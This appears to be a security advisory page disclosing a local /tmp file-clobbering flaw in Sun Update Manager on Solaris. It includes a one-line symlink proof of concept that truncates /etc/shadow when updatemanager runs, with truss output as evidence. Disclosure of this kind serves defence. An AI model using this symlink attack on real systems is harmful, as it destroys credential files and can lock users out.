Sun Update Manager /tmp Clobber

2012.07.21

Credit: Larry Cashdollar

Risk: Medium

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

(author http://packetstormsecurity.org/user/lcashdol/)?

Noticed this during routine patching.

/tmp file clobbering vulnerability in Sun Update manager.
7/15/2012

noticed this while patching my lab solaris system tonight.

larry@s0l4r1s:/tmp$ ln -s /etc/shadow  com.sun.swup.client.LOCK

updatemanager is run

larry@n1caragua:/tmp$ ls -l /etc/shadow
-r--------   1 root     sys          0 Jul 19 18:49 /etc/shadow

SunOS s0l4r1s 5.10 Generic_147441-19 i86pc i386 i86pc
larry@n1caragua:~$ 

truss output:

4841/2:         stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
4841/2:         open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5

References:

http://packetstormsecurity.org/files/114908/sunum-clobber.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Sun Update Manager /tmp Clobber

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.